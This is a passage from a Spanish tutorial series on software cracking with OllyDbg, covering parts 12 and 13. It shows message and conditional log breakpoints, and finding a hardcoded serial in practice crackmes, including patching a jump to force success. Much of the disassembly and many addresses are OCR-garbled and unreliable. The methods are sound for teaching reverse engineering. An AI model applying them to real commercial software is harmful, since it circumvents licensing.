TR UFCKEVDOUIN 


O Breal WMCDEADCHAR 
WHTSYSKEVDOUN 
Di WMUSYSKEWUP 
WHZSYSCHAR 
— WMTSYSDEADCHAR 
9 WMHCWNT_CONUERTREQUESTEX 
WMCCONUERTREQUEST 
WMTCONUERTRESULT 
WMHCINTERIM 
e WMHCIME_STARTCOMPOSITION 
: WHCIMEENDCOMPOSITION 
10F WMHCIME COMPOSITION 
. 


Log W'inProc arguments: 


T” Sort messages by name Cancel | 


El tipo de mensaje 101 o sea WM_KEYUP para que pare cuando soltamos la tecla. 


Set breakpoint on WinProc 
Messages: | 181 WMLKEYUP. 


(* Break on any window 
ba E reak on all yin 
C Breal 


Never On message Pass count [dec.] 


Pause program: > 0. 


Log W'inProc arguments: $ (e 


Sort messages by name Cancel | 


i e gl 
BO04907F8 Register Topmost 14030604 | B0b10101 
BB410728 Cancel 004907FS DOBBB2EB | 50010000 | BBBBBODA 
pasDa7os Serial BO4907FS DOBOFFFF | 50020000 | DOBABABA 
BF 20736 BO4907FS BOOBB3ES| SOB100S0| BOBBBZOS 
B11AB79C OK BO4907FS BODBB3EA| 50010001 | BOBABBAS 
611E06B2 Name BO4907FS DOBOFFFF | 50020000 | DOBOBABA 
OSBEB?CC 004907FS DBBBB3E9| 50010080| BOBBBZO4 
61840738 CrackMe v1.0 Topmost ID: 


Apretamos una tecla para escribir el nombre en la ventana de user y serial y vemos que en este caso no 
para, porque el programa no procesa los mensajes de la presión tecla por tecla, pero es bueno saberlo 
porque hay programas que si lo hacen, y comparan carácter por carácter a medida que tipeamos, y por eso 


hay que tener en cuenta para esos casos esa opción. 


Ahora esto trae otros interrogantes, podemos hacer que OLLY nos liste los mensajes que utiliza el 
programa sin parar, de forma de luego poder utilizar el BMSG que sabemos que funcionara, pues es 


utilizado? 


Pues es sencillo, lo que tenemos que hacer es utilizar un BMSG que sabemos que funciona, como en este 
caso el 202 y poner un BMSG en el y que se detenga como hicimos en el primer caso, quitamos todos los 
BPX en la ventana B y repetimos hasta que pare al apretar el botón OK por BMSG 202 


WM_LBUTTONUP 


Set breakpoint on WinProc 
Messages: | 282 WNLLBUTTONUP. e] 


(+ Break on any window 
C Break on all windows with same title 


€ Break on actual window only (invalid in next session] 


Never On message Pass count [dec.] 


Pause program: o (e | 0. 


Log WinProc arguments: E) (e 


ls 
[Sort messages by name Cancel | 


Lo colocamos y apretamos OK en la ventana de ingresar el serial. 


4 loa ll ln 1 ts a a aia 3 PS SS $9 Y | 


FF 0U EDI,EDI 
a] SS PUSH_EBP 
1|  8BEC MOU EBP,ESP 
3|  28B4D 08 MOU ECX,DWORD PTR SS: [EBP+8] 
é 
7| ES B4D4FDFF 
C FO MOU ESI,EAX 
El 85F6 TEST ESI,ESI 
e 74 38 
8Bs5 ac MOU EDX, DWORD PTR SS: [EBP+C] 
CMP_EDX, DWORD_PTR_DS: [77D709E8] 
XOR EAR, EAR 


Vemos que allí paro ahora modificaremos las cosas para que loguee todos los mensajes utilizados por los 
botones. 


Vamos a la ventana B 


Jejmjrjw)m] e) ]x]8]rJ.04s] 


[B] File View Debug Plugins Options Window Help 


ax] e jo] vis] sia] 1] + 1jejmit]iwjn[c]/]k[B]R/».. 


Address [Module [Active Disassemb ly Comment 


USERS2 Log "<WinProc>” MOU EDI,EDI 


Allí esta el BMSG, así que haré CLICK DERECHO-EDIT CONDITION 


ax] e jo] vis] sia] 1] + ujejmitiwu[c]//xK[B]5 


Address [Module [Active Disassemb ly Com 


Follow in A 


Modify conditional log breakpoint at USER3... [Xx] 


Condition: 
==4'M_ LBUTTONUR 
Explanation: Expression: 
[<WinProc> v | = v | 
Decode value of expression as: [Assumed by expression v ] 
Never  Oncondition Always Pass count [dec.] 
Pause program: e dj 2 0. 
Log value of expression: ol o e. 
Log function arguments: * Oj 2 


If program pauses, pass following commands to plugins: 


Cancel | 


Vemos que el BMSG es un BREAKPOINT CONDICIONAL, cuya condicion es que [esp +8] sea 202 en 
este caso o sea WM_LBUTTONUP, si vemos el stack 


YrD018734 | CALL to Assumed WinProc from USER32. 77018731 
htind = BB9CO7SE (*"OK” ,class="Button” parent-104707B4) 
Hessage = WM_LBUTTONUP 


Keys = 


X= 68. Y = 24, 
RETURN to USER32. 77D3B00E 


IS 


Allí esta el valor 202 en [esp +8] 


Si tienen dudas que es ESP +8 hacen doble click aquí 


YrD1S734 
BO9COFSE 


CALL to Assumed linProc from USER32. 77018731 


(Am 
aaa aaa aa 


D0BBB20Z 
151s1515]5]5]515] 
00130044 
Y7D3B00E 
DCBARBCD 
15]s/515]515]515] 
au12FD1C 
Y7D3BO0E 
9012FD43 
rrDiss16 
Y7D3B00E 
DOB9CO7SE 
p0BBB2OZ 
15]s1515]515]515] 
00130044 


hlind = BB9CB7SE (" OK” ,class="Button”, parent=104707B4) 


RETURN to USER32.77D3B00E 


RETURN to USER32.77D18816 from USERS32.77D1870C 
RETURN to USERS2.77D3B00E 


En la direccion de la parte superior del stack 


13734 
BB9COTSE 
BODaBZ0Z 
(5Js19J51515]51%) 

0130044 
Y7D3B00E 
DCBARECO 
(als [515151515] 
Ba12FD1C 
77D3B00E| RETURN to USER32.77D3BB00E 
[eres 


Ha 


Y/D18816| RETURN to USER32.77D18816 from USERS32. 77018760 
e RETURN to USER32. 77D3B00E 


Y cambia la numeración relativa a ESP, allí vemos que es “$ + 8” o “ESP + 8” 


Bueno la cuestión es que en [esp+8] esta el numero del BMSG que necesitamos saber asi que cambiamos 
en la ventana del BREAKPOINT. 


Modify conditional log breakpoint at USER3... [Xx] 


Conditior: 

” ] 
Explanation: Expression: 
<W'inProc> w | = |[esp + 8] ” 
Decode value of expression as: [Assumed by expression y ] 


Never  Oncondition Always Pass count (dec.] 


Pause program: aj e Ss | 0. 


Log value of expression: E e (e 


Log function arguments: Cc $ (e 


lf program pauses, pass following commands to plugins: 


Cancel 


Para que loguee el valor que se encuentra en EXPRESSION en este caso [esp + 8], que no pare o sea en 
PAUSE PROGRAM ponemos NEVER y LOG VALUE OF EXPRESSION y LOG FUNCTION 
ARGUMENTS pues no esta demás en ambos que los loguee ALWAYS o sea SIEMPRE. 


Aceptamos y vamos a colocar nuestro nombre y serial nuevamente al apretar OK miramos el LOG y 
vemos la lista de mensajes que usa el programa en los botones con sus nombres y números. 


COND: <tlinProc> = 04BBB4us7 
CALL to Assumed WinProc from USER32.77D18731 
hlind = BOF60728_("OK”, ,class="Button”, ,parent=01270778) 
Message = lWM_GETDLGCODE 
wParan = 0 
lParam = B 
COND: <WinProc> = B04BBBS? 
CALL to Assumed WinProc from USER32.77D18731 
hlind = 641507DA (*"Cancel”,class="Button*, ,parent=01270778) 
Message =_lM_GETOLGCODE 
wParam = 
lParam = 0 
COND: <llinProc> = BOBABBF4 
CALL to Assumed WinProc from USER32.77D18731 
hlnd = 06F60728 (*OK”,class="Button”,parent=01270778) 
Message = BM_SETSTYLE 
Style = BS_DEFPUSHBUTTON 
Redraw = TRUE 
COND: <llinProc> = 90000201 
CALL to Assumed WinProc from USER32.77D18731 
hlind = B0F60728 ("OK”, ,class="Button”, ,parent=01270778) 
Message = WM_LBUTTONDOWN 
Keys = MK_LBUTTON 


COND: <WinProc> = BOBBBBD? 
CALL to Assumed WinProc from USER32.77D018731 
hlind = BOF60728_ ("OK” ,class="Button”, ,parent=01270778) 
Message = WM_SETFOCUS 
hlindLose = 6BA3B75E (class="Edit” parent=01270778) 
lParam = B 
COND: <blinProc> = BABABBF3 
CALL to Assumed WinProc from USER32.77D18731 
hlind = 66F60728 ("OK”,class="Button”,parent=01270778) 
Message = BM_SETSTATE 
Hiaohlight = TRUE 
lParam = 0 
COND: <blinProc> = B4BBBZ0B 
CALL to Assumed WinProc from USER32.77D18731 
hlind = BOF60728 ("OK”,class="Button” ,parent=01270778) 
Message = lWM_MOUSEMOUVE 
Keys = MK_LBUTTON 
»= 47. Y = 10, 
<WinProc> = 0BBBBAF3 
CALL to Assumed WinProc from USER32.77D18731 
hlind = BOF60728_ ("OK”,class="Button”,parent=01270778) 
Message = BM_SETSTATE 


: <WinProc> = a2 

CALL to Assumed WinProc from USER32. 77018731 

hlind = B64FEB728 (*OK” ,class="Button”, parent=01270778) 
per WM_LBUTTONUP 


pr = 
COND: <WinProc>-= BOBODOF3 
CALL to Assumed WinProc from USER32.77D18731 
hlnd = 66F60728 (*0K”,class="Button”,parent=01270778) 
Message = BM_SETSTATE 
Highlight = FALSE 
lParam = 6 
COND: <tlinProc> = 000008 
CALL to Assumed WinProc from USER32.77D18731 
hlind = BOF60728 ("OK”, ,class="Button”, ,parent=01270778) 
Message = WM_KILLFOCUS 
hlindGet = M1270778 ("Register” class="432770") 
lParam = 0 
COND: <linProc> = 00BBBuBZ 
CALL to Assumed WinProc from USER32.77D18731 
hlind = 00F69728_("0K",class="Button” ,parent=01270778) 


Allí vemos como dije que utiliza el 201 WM_LBUTTONDOWN y luego 202 WM_LBUTTONUP, y que 
no utiliza los de tecla WM_KEYUP o WM_KEYDOWN jeje. 


Para hacer un logueador genérico para todo el programa (botones, ventanas etc) se deben hacer 
condicional breakpoints en las apis que manejan mensajes. Podemos utilizar las apis TranslateMessage y 
DefWindowProcA que se complementan en su logueo. 


Si quieren un reporte completo pueden poner un breakpoint condicional en las dos apis, veamos como se 
hace eso. 


Para hacer rápido tipeo en la commandbar BP TranslateMessage y BP DefWindowProcA. 


| | | 
Command Bp DefWindowProca] y] Br 
S 


Ó—————==—— 


Command BP Translatemessage] y] BP: 
| Breakpoint at USER32.DefWindowProcá, 


Con eso ponemos dos BPX en las apis ahora los transformaremos en condicionales vamos a la ventana B 
y hacemos click en el primero FOLLOW IN DISSASSEMBLER. 


AU A] AY JS +$5/3=) 2)  —"=)' JN MEN 15000 00 ME MS ES E IE OS 


Address |Module  |Mctive Disassemb ly Cor 
Ways , 
USER32 ¡Always PUSH 14 


RABO opaca | P- 1 TP — + y Y PEA 


55 PUSH_EBP | 
8BEC MOU EBP,ESP Backup 


S67s 08 FOU ESI,DWORO | Copy > 

66:817E_08 ESÍCMP WORD PTR L 

reg SE7E0200 Binary » 

ES ocrerrrr [emesersaore Assemble Space 

Eb Por. E6P | Label : 
TEST EAX,EAX | Cormment F Ñ E 
A * 
JM SHORT Useñ Run trace >| Conditional Ss 

| New origin here CtriGray * do dd 109 
Run to selection FP 


Gn tn » 


Ahora que estamos en la dirección, colocamos el BREAKPOINT CONDICIONAL LOG. 


Set conditional log breakpoint at USER32.7... [X] 


Condition: 
| El 
Explanation: Expression: 


v ] > [msG ho 
Decode value of expression as: [Assumed by expression E 


Never  Dncondition Always Pass count [dec.] | 


Pause program: Oj 2 o 0. | 


Log value of expression: $ a (e 


Log function arguments: »> 2 ¡al | 


If program pauses, pass following commands to plugins: 


Cancel | 


Poniendo como expresión a loguear MSG que es el valor del tipo de BMSG por ejemplo en 
WM_LBUTTONUP era 202 en ese caso MSG=202 


Ponemos que no pare nunca y que loguee siempre y realizamos el mismo trabajo en la otra api. 


Set conditional log breakpoint at USER32.D... E 
Conditiory: 
| >] 


Explanatiorr: Expression: 


y | a [msG 5 | 
Decode value of expression as: [Assumed by expression Eu | 


Never  Oncondition Always Pass count [dec.] 


Pause program: Oj E 2 0. 


Log value of expression: E o ls (e 


Log function arguments: S / (e 


If program pauses, pass following commands to plugins: 


Cancel 


Ya tenemos convertidos los BPX en CONDICIONALES 


14 fi] Pc JA ca LN 
Address | Module 
Y77D018BF6 | USER32 


jad MOE Oka ala Y Y Y | 
Disassemb ly 
MOU EDI,EDI 
PUSH 14 


y si queremos que ya que los resultados serán muchos se loguee a una fila txt en el LOG. 


vindow Help 


] y]elmjt[wu]c)+]x/B]R]-s] ¿=81?) 


60 


Hacemos click derecho LOG TO FILE 


Appearance » 


Y elegimos el nombre del archivo de texto que lo guardara, ahora damos RUN. 


O ES 
Source = MSGF_MENU 

hlind = 031507F8 (class="132768”, parent=00140742) 

770104EE|COND: 40BBB121 

77D1D4EE|CALL to DefllindowProcA from CRACKME. 6640118C , 

hlind = 00146742 (*"CrackMe v1.0",class="No need to disasm the codet”) 
Message = O 

Source = MSGF_MENU 

hlnd = BaLeO7FO [lclass="432768"” ,parent-00140742) 

770104EE|COND: 60BBB121 

Y7D104EE| CALL to DefWindowProcA from CRACKME. 66401180 

hlnd = 001460742 ("CrackMe v1.0",class="No need to disasm the codet”) 
Message = A 

Source = MSGF_MENU 

hlind = 6315907F8 (class="32768”,parent=00140742) 

77D1D4EE|COND: M90990BBS5 

77D104EE| CALL to DeflWindowProcA from CRACKME. 60401180 A 

hlind = E CLOS v1.0",class="No need to disasm the codet”) 
Message = M_NC 

Region = Eoba193e. (reoloÑ 


lParam = 0 
77D104EE|COND: 400000014 
Y7D1D4EE| CALL to DeflWindowProcA from CRACKME. 60401180 
hlind = 66140742 (*"CrackMe v1.0",class="No need to disasm the codet”) 
Message = lM_ERASEBKGND 
hDC = 9401167D 
lParam = 0 
770104EE|COND: 44094B125 
77D1D4EE| CALL to DeflWindowProcA from CRACKME. 6040118C 
hlund = 001460742 ("CrackMe v1.0",class="No need to disasm the codet”) 
Message = o 
AS BaBS4m6F4 


770104EE|COND: 0004B11F 

Y7O01D4EE| CALL to DeflWindowProcA from CRACKNME, B646118C 

hlind = 001460742 (*"CrackMe v1.0",class="No need to disasm the codet”) 

Message = WM_MENUSELECT 

ia = 8. Flass = = MF_BYPOSITION:MF_SEPARATOR:3:MF_BITMAP i MF_ZOWNERDRAWi MF_POPUP ;MF_ME 
enu = 

770104EE| COND: 0O0BBBZ12 

77D01D4EE| CALL to DefllindowProcA from CRACKME. 66401180 

hlind = 001460742 ("CrackMe v1.0",class="No need to disasm the codet”) 

Message = WM_EXITMENULOOP 

IsPopllp = FALSE 


lParam = 0 
77D1D4EE|COND: 040B0BBS6 
77D1D4EE| CALL to DefllindowProcA from CRACKME, 66401 18C 
hlind = 60140742 ("CrackMe v1.0", ,class="No need to disasm the codet”) 
Message = MU NCACTIUATE 
Active = FALSE 
lParam = 6 
77D01D04EE|COND: 1M4BBBBaS 
Y7D1D4EE| CALL to DeflWindowProcA from CRACKME. 6040118C 
A = o014 B742 ("CrackMe v1.0",class="No need to disasm the codet”) 
sage = lIM_ACTIUVATE 
UA. INBÉTTUE Minimized = B 
hlind = NULL 
770104EE|COND: 44BBBB1C 
77D104EE| CALL to DefWindowProcA from CRACKME. 6648118C 
hlund = 001460742 ("CrackMe v1.0", ,class="No need to disasm the codet”) 
Message = IWM_ACTIVATEAPP 
E = FALSE 
ThreadId = ACA 
770104EE|COND: MO4BBBBOS 
Y7D1D4EE| CALL to DeflWindowProcA from CRACKME. 60401183C 
hlind = 600146742 (*"CrackMe v1.0",class="No need to disasm the codet”) 
Message = WM_KILLFOCUS 
hlindGet = NULL 
lParam = 0 
6| COND: 00BABBAF 
| CALL to TranslateMessage from epi 6040110C 
pMsg = WM_PAINT hw = 140742 ("CrackMe v1.B”) 
770104EE|COND: MABBBBBF 
7Y7D1D4EE| CALL to DeflWindowProcA from CRACKME. 6040118C 
hlnd = 001460742 ("CrackMe v1.0",class="No need to disasm the codet”) 
Message = WM_PAINT 


Vemos el resultado del LOGUEO completo de todos los mensajes, los cuales se guardan en una fila txt, la 
cual luego podemos mirar con detenimiento para ver cual BMSG nos conviene mas colocar y en donde ya 
que el listado nos muestra cada mensaje en que ventana, boton, etc se aplica. 


Sabiendo manejar correctamente los BMSG puede ser una gran ayuda ya lo veremos en casos de NAGS 
que se utiliza el WM_CLOSE para que pare cuando se cierra la msima y mil usos mas hay mensajes para 
casi todos los eventos que pueden ocurrir en una ventana. 


Espero que lo hayan entendido y les sirva, en la próxima parte terminaremos de hallar el serial valido para 
el CRACKME DE CRUEHEAD 


Hasta la parte 13 
Ricardo Narvaja 


30 de noviembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 13 


TRABAJANDO PESCANDO Y REVIRTIENDO SERIALES 


Creo que una de los temas mas candentes de hoy en día es el tema de hallar seriales, sobre todo luego de 
que existen fuertes encriptaciones que pueden llegar a complicar la cosa, igual iremos paso a paso desde 
el caso mas simple al mas complejo, tratando de practicar bastante para poder afianzar los conceptos de 
trabajar con seriales. 


Bueno esta primera parte del trabajo con seriales lo dedicaremos a los HARDCODED, que son los 
seriales que no son calculados a partir de un nombre, o sea es un serial fijo que puede ser un texto, un 
numero pero es siempre el mismo y muchas veces son sencillos otras no tanto, se tiene el concepto que 
son los mas fáciles de hallar jeje, por eso empezamos por este tipo, pero hay de todo fáciles y mas 
difíciles ya verán los ejemplos en esta parte. 


Tenemos cuatro ejemplos para practicar, dos haremos en esta parte 13 y los dos mas difíciles en la parte 
14. 


El primero de los cuatro que veremos es el llamado LECCION 13 HARDCODED 1, que se encuentra 
adjunto con la teoría es el caso mas simple, abrámoslo en OLLYDBG. 


QNVIODUu 


[e] File View Debug Plugins Options Window Help 


maj«x] eju] els] $8] U] +) 1) CPPEPREEEA ESFkal 


proc 


Es BDBB000a | Becioda [eHandleA 
AS 60304000 | MOU LORD PTR DS: [403060], EAX 
Es Di00000a it deso rid 


69 6u PUSH U 

68 2E104000 |PUSH Leccion_.0040102E = Leccion_.B040102E 
6A Ba Eu He hOwner = NULL 

6A 65 pTe mplate = 65 

FF35 sa3n4gal PUSH Sono PTR_DS: [403050] hInst = NULL 

Es A300000a DialogBoxParamA 

6A Ba ¡PUSH O Ex itCode B 

ES 0000000 CALL <yMP.£kerne132.Ex itProcess> Ex itProcess 


S8BEC MOU EBP,ESP 
8845 ac MOU EAX, DWORD PTR SS: [EBP+CJ 
En AE [CMP EAX, 110 


vw EB 77 
3D 11010000 paa EAX, 111 
a, 10 EBO31 CMP DWORD PTR SS: [EBP+10],3EB 


_14 (28, 
= Lecoi E O 
Ba2 


pp = 
)LID= 3ER Ti 


ES lóso4000 ars Son .D0403010 
El E | PUSH 3EA 

Bs [PUSH DWORD PTR SS: [EBP+8] 
ES ¡si0s0so 


A 133040 pen 
5210 L0s0300l MOU EBX, DWORD PTR DS: [403019] 
E Na CMP_EBX,DWORD PTR DS: [403008] 
E] [rán [2] 


6A sa | BUSH B 
AR AR2AARA 1PIUSA ll enrian .AAGAZASE 


hlind 
alienta 
[OU EDX,Leccion_. 00403008 ASCII "FIACA” 


= Me OK:MB_APPLMODAL 
mal Muu MAI” 


Sty 
[Titi = 
Test. 


Allí esta en el inicio, el caso mas simple de los HARDCODED es el que aparece la clave correcta en las 
STRINGS o CADENAS DE TEXTO que utiliza el programa, miremos si aquí aparece. 


Para hallar las cadenas de texto o strings, hacemos click derecho SEARCH FOR — ALL REFERENCED 
TEXT STRINGS. 


¡MB_APPLMODAL 


Go to > 
Follow in Dump » 
View call tree Ctrl+K 


q012FFCS 38 
Name (label) in current module Ctri+h 


» 
» | Name in all modules 
i » 
aL E Eb k Command CtrHF 
AE ] ás A Sequence of commands Ctrl+s 
nalysis 
z Constant 
Appearance » Binary string Ctri+B 


All intermodular calls 
All cormmands 

All sequences 

All constants 

All switches 

All referenced te: 


Menradafinad aha! 
Los resultados son 


MAYA] *"j00 375) $345) 20] %%J MMM 0 ME 0 16 IE E 


Address |Disassembl Text _strin 


604501000 H (Initial CPU selection 
60401061 /|M0U EDX,Leccion_. 00403098 ASCII ”FIACA” 
604901073) PUSH Leccion_. 00402035 ASCII "Mal Muy MAL” 


Pues allí se ve la palabra FIACA que puede ser la clave, si no tenemos ganas de trabajar podemos probar 
algunas strings que salen en la lista y por ahí acertamos, pero este método no es aconsejable, por las 
siguientes causas: 


1)En este caso hay 2 strings, pero hay programas que tienen miles de strings, y probar una por una puede 
llevar a la locura total, así que aunque vemos allí el posible serial correcto, haremos como que hay mil 
strings y que no sabemos cual es. 


2) Hay programas que ponen strings tramposas en la lista que no son la clave y que al tipearlas al ingresar 
un serial provocan algún perjuicio ya que son trampas para crackers, así que lo mejor es asegurarse y 
verificar que es el serial correcto llegando hasta la comparación entre lo que tipeas y la string correcta. 


Lo primero es mirar las apis que utiliza con click derecho-SEARCH FOR- NAME (LABEL) IN 
CURRENT MODULE 


omar y 


CMP DWORD PTR SS:[ 


«JNZ SHORT Leccion_ 

A. Assemble Space 200) 

PUSH Leccion_.9044 Label ' ccion_. 200403010 
USH 3EA (1082. ) 


Pl 
PUSH DWORD PTR SS: 
PALL <P 2usera2a Comment ; 


MOU EDX,Leccion_.4 a a” 

MOU EBX, DWORD PTR Breakpoint » 

CMP ocean PTR Hit tr > 

PUSH B be OK MB_APPLMODAL 
PUSH 8 Run trace » 


H Leccion_.90044 Muy MAL” 


PUS 
PUSH DWORD PTR SS: 


Je SHORT Leseton. GOO » 


a Follow in Dump » 
View call tree CtriK 


OK MB_APPLMODAL 


Name (label) in current module Ctrl 
Name in all modules 


Anas Find references to 


.......”. Lima » 


Ahí salen las apis utilizadas por el programa, veamos si hay alguna conocida 


BO4B2618| .rdata Import : DialogBoxParamA 
B0402020| .rdata Import EndDialog 
BO4B20BC| .rdata Import i 
BO4B201C| .rdata Import 
0402088 | .rdata Import . GetModu leHandleA 
0402000 | .rdata Import i Controls 
B0402014 .rdata | Import 
D0401000| .text Export ¿Modu leEntryPoint 


Allí vemos que utiliza GetDlgltemTextA, seguro la usara para ingresar el serial que nosotros tipeamos y 
MessageBoxA para sacar los mensajes de si es correcto o incorrecto nuestro serial, pongamos un BPX en 
cada una de dichas apis. 


B0402018| .rdata | Import 
B0492020| .rdata | Import 
60402000 | .rdata Import 
BO4B201C .rdata Import 
10402008 | .rdata Import 
Sada oa o ñ cl Foll tinD bl 

«rdata mport user32.MessageBox we import in Disassembler 
60401000 | .text Export Modu leEntryPoint> tad po 


«DialogBoxParamA 

ndDialog 

«ExitProcess 
etDlgltemTent E 
etModu leHan Actualiza 


Follow in Dump 
Find references to import Enter 
View call tree 


Toggle breakpoint on import 


Conditional breakpoint on impówt 


Ponditinnal lan hrealnnint an imnnrt 


En ambas click derecho — TOGGLE BREAKPOINT ON IMPORT o en la commandbar 


| 


Command Bp GetDigitemTeta —]  w|! 
Analysing Leccion_: 2 heuristical procedures, 8 calls to k 


Commancl NE 


¡BP address, string -- 


Amnalusina l arcian + 9 hanristical macraduras L eallo ta bnmamn himetianmo 


Bueno pulsemos F9 para correr el crackme 


Serial 


Allí sale la ventana para tipear el serial, pongamos un nombre cualquiera por ejemplo narvajita jeje 


Serial 
| narvajita ] | 


Apretemos Verificar y vemos que para en el OLLYDBG en uno de los BPX que colocamos 


E PS view  DELUY O FIUQIrR OPUS VYIIUOY O MET 


ax] eu] vis] $0) 9] +=) L]ejm/r) 


. 
55 PUSH_EBP 

B8BEC MOU EBP,ESP 

FF75 BC PUSH DWORD PTR SS: [EBP+C] 
FF7S 08 PUSH DWORD _PTR SS: [EBP+8] 
ES ES9BFEFF — |CALL“user32.GetDlgltem 
EIA] TEST EAX,EAX 

74 0E 

FF75 14 PUSH DWORD PTR SS: [EBP+14] 


FF7S 10 PUSH DWORD PTR SS: [EBP+10] 
E] PUSH EAX 

EB_BE 

837D 14 08 CMP DWORD PTR_SS: [EBP+14],0 
74 06 


8B45 10 MOU EAX, DWORD _PTR_SS: [EBP+10] 
Cóga un MOU BYTE PTR DS: [EAXJ,8 
3300 EAX 


Si miramos el stack, vemos que paro en la api GetDlgltemTextA para ingresar el serial, allí en los 
parámetros de la api, vemos la dirección del BUFFER donde guardara el serial que ingresa, en este caso 
es 403010. 


6012FB04 
Fl 


B0401061|FPCALL to GetDlaltemTextA from Lecci: 
DO4A028A | hlind = 004AB28A ("Leccion 13 by Re: 
BOBBO3EA|| Control1D = 3EA (1002.) 

a 2 e 
Address » 
Show ASCH dump 

Show UNICODE dump 


Lock stack JN 


Copy to clipboard Ctri+e 
Modify 

Edit crkhe 
Push DWORD 

Pop DWORD 

Search for address 

Search for binary string Ctrl+B 


Go to ESP sa 
Go to EBP 
Go to expression Ctri+G 


o] 


Hagamos EXECUTE TILL RETURN para que llegue al RET de la misma. 


Window Help 


Run F9 [| 
Restart CtrhF2 
Close AIHE2 
Step into F7 
Step over Fe 
Animate into Cr? 
Animate over Ctri+F8 
e till return CtrHF9 
Execute till user code * AltF9 


Ahora estamos en el RET 


ES ESTUBE E RES EREBE BO ES 


PUSH E AA qu 


POSHa LORO" PTR SS: [EBP+CJ 
PUSH DWORD_PTR SS: [EBP+8] 

CALL userdz.cetDlalten 

JESSAORT userg2. 77068049 
PUSH DWORD PTR SS: [EBP+14] 
PUSH DWORD PTR SS: [EBP+10] 
USH EAX 


CMP DWORD P :¿[EBP+141,0 


MOU EAX, DWORD _PTR ln aa 
ne y BvTE PIR DS: CEAX 


narvajit 


den... 


Bo 66 060 00 66 060 00 6n 


Pues allí lo tengo 


Si apreto F7 y vuelvo al programa 


O A 


MOU EDxX,Leccion_ 1I300S ASCII "FIACA"” 
01 MOV EBX, DWORD DS: [403010] 

CMP_EBX,DWORD PTR DS: [463008] 

Style = da UN MB_APPLMODAL 
B Title 
USH Leccion_.00402035 H Mal EAU MAL” 

PUSH DWORD _PTR SS: [EBP+8] hO 

MescageBorA 


Style = 4 OK iMB_APPLMODAL 
Tit LLL 


Sty 

. a e= 
. USH Leccion_. 00402028 Text = Muy BIENiiii” 
. PUSH DIJORD PTR SS: [EBP+8] hOwner 
a MessageBoxA 
27 

CMP EAX, 10 
Y 

PUSH M Result = MB 

PUSH DWORD PTR SS: [EBP+8] (túna 

EndDialog 


MOU EAX, O 
LEQUE 


AASATARA 


Ya vemos viendo que estamos llegando a la comparación y al salto condicional que según salte o no me 
llevara a los MessageBoxA de “Mal Muy MAL” o “Muy BIEN” obviamente si ese salto condicional lo 
cambio por un JMP 401087, lo obligo siempre a saltar al cartel de MUY BIEN y programa parcheado y 


resuelto, pero aquí yo quiero hallar el serial, así que veamos que compara. 


En 401066 moverá a EBX el contenido de la memoria 403010 como es un DWORD solo moverá los 4 


bytes pero es suficiente, veamos que hay en 403010 en el dump. 


A A A AS uecUIgLTENISHTH 
0040 . BA 6s3040098 |MOU EDxX,Leccion_ .400403003 ASCII "FIACA” 

2 BL al HOU- EEX-DUDRO PTA DS: [4a39181: 

. OS MP_EBX, DWORD PTR DS: [493008] Backup » 

Se 

. 6A 00 ERE 17] IDAL 
64 00 PUSH O Copy . 

. 68 35204009 |PUSH Leccion_.00402035 Bi » 

a E a PUSH DWORD PTR_SS: [EBP+8] Inary 

Eo | Oe aNonT Leccion: .osablas8 | Assemble Space 

Y 6a on pus 9 DAL 

. SA 00 PUSH 8 Label h 

O 

a 

e ¿NE SEORT Lecoion_.0B4910Re ind Ñ 

CY A 06 Hit trace » 
FF75_08 PUSH QuoRO PTR_SS: [EBP+8] 

lv EB 69 

> Bs 60099099 |MOU EE [5] 

. C9 LEAUE Go to » 

 C2 1000 RETN 19 | — 

o ollow in Dump Selection 
5S Ez) REN 10 View call tree CtrlKk 

.7 FF25 BC204901 Jr 

¿- Eres 0S20499 a : 


61 6A 69 74'narvajit 


6l eo DO 00 00 0 d....... 
Ba Ba Y ........ 
1515) 

0 60 06 a 


0 66 06 00 60 06 00 6n 


En la aclaración veo que esta leyendo 7672616E que son los 4 bytes que se encuentran en el contenido de 
403010 leídos al revés como vimos, y son los primeros 4 bytes del serial falso que yo tipee los cuales 
mueve a EBX. 


EIP an401m6C 


MNNRDDO 


LHLL SM. RUSENIC, DETULDITEN ER TH? *uetuUlgItemier 

50 EDxX,Leccion_. 00403008 ASCII "FIACA" 
D0Í MOU EBX, DWORD PTR DS: [403019] 

204001 CMP_EBX, DWORD PTR DS: [403008] 


PUSH 9 Sty 
PUSH O. Tit 


MB_OF 
HULL. 


om 
mi 


Aquí vemos que compara EBX que como recordaran son los primeros 4 bytes de mi serial falso, con el 
contenido de la dirección 403008, veamos que hay allí en el dump, de la misma forma que hicimos en la 
línea anterior. 


narvajit 


IA 


Vemos que esta leyendo los 4 primeros bytes de la palabra FIACA, comparándolos con los primeros 
cuatro bytes que tipee, por lo cual deduzco que si ambos fueran iguales en esta comparación, se activaría 
el flag Z, al ser la diferencia entre ambos cero, y el JE saltaría, mandándome el cartel de MUY BIEN, por 
ahora como no son iguales recibiré el escarmiento jeje, 


MOU EDx,Leccion_. 600403008 
MOU EBx,DWORD PTR DS: [403010] 
Car ORURO PTR DS: [403008] 


PUSH A 


SCII "FIACA” 


A 


- 18_0K:MB_APPLMODAL 
7 a PUSH NUEL 

ñ a PUSH Leccion_. 00402035 "Mal Muy MAL” 
104010 PUSH DWORD PTR SS: [EBP+8] 

004910 eBoxA 

Y 15 

1] PUSH A Es APPLMODAL 
a El B 

aB a H Leccion_. 0040: = Muy BIEN Ed 

a a PUSH DWORD PTR SS: CESP+81 Own e 

17] a EeaRorBO4R 


CMP EAx, 10 


Como no fueron iguales no salta y va directo al cartel MAL MUY MAL, pues apretemos F9 


CEA a] ++. Hu: al +) 1/2jm/1/w)H/ e). 


PUSH ESP 

MOU EBP,ESP 

CMP_ DWORD PTR_DS:[77D704ECJ,0 

JE SHORT user32. "7DS951€ 

3| MOU EAX, DWORD PTR FS:[18] 
PUSH A 


PUSH DWORD _PTR_ DS: E 
PUSH user32.77D07BB 


TEST _EAX,EAX 
MOU DWORD PTR DS: [770706B201,1 
PUSH B 


PUSH DWORD PTR SS: [EBP+14] 
PUSH MARN PTR <S*+TERP+141 


13 by RedHBwkK 


Y ya vemos que nos va a decir MAL MUY MAL en los parámetros de la api. 


Demos run o F9 


Leccion 13 by RedHawK  .: [CracksLatino...(X] 


Serial 
E3 


narvajlta 


Mal Muy MAL 


Como vemos salio el cartel malo, aceptémoslo y escribamos la clave correcta FIACA. 


Leccion 13 by RedHawK — .: [CracksLatino...[(X) 


Selial 


FAC] 


Celica) 
Apreto VERIFICAR y repito el proceso anterior hasta llegar a la comparación 


